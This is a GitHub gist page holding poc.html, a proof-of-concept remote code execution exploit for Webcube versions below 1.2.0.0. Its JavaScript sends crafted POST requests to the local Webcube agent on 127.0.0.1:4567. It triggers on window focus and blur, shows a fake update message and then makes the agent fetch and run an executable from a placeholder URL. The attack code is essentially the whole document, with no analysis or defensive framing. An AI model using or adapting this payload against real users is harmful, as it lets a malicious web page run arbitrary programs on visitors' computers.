Skip to content

Instantly share code, notes, and snippets.

@po6ix

po6ix/poc.html

Last active September 8, 2022 22:04
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save po6ix/5fca37beb20578b1585e3aa678bdf263 to your computer and use it in GitHub Desktop.
Save po6ix/5fca37beb20578b1585e3aa678bdf263 to your computer and use it in GitHub Desktop.
Download ZIP
Webcube < 1.2.0.0 RCE
Raw
poc.html
<script>
flag = 0;
window.onload = window.onfocus = () => {
if (flag) return;
fetch('http://127.0.0.1:4567/WebCube/RetCmd?CmdMethod(1061,"1199",5678,"Update is prepared for Webcube!",1111,2222,"<EXE_URL_SIGNED_WITH_TERUTEN>")', {method:'POST'})
};
window.onblur = () => {
if (flag) return;
flag = 1;
fetch('http://127.0.0.1:4567/WebCube/RetCmd?CmdMethod(1061,"1199",5678,"",1111,2222,"<EXE_URL_TO_EXECUTE>")',{method:'POST'});
};
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment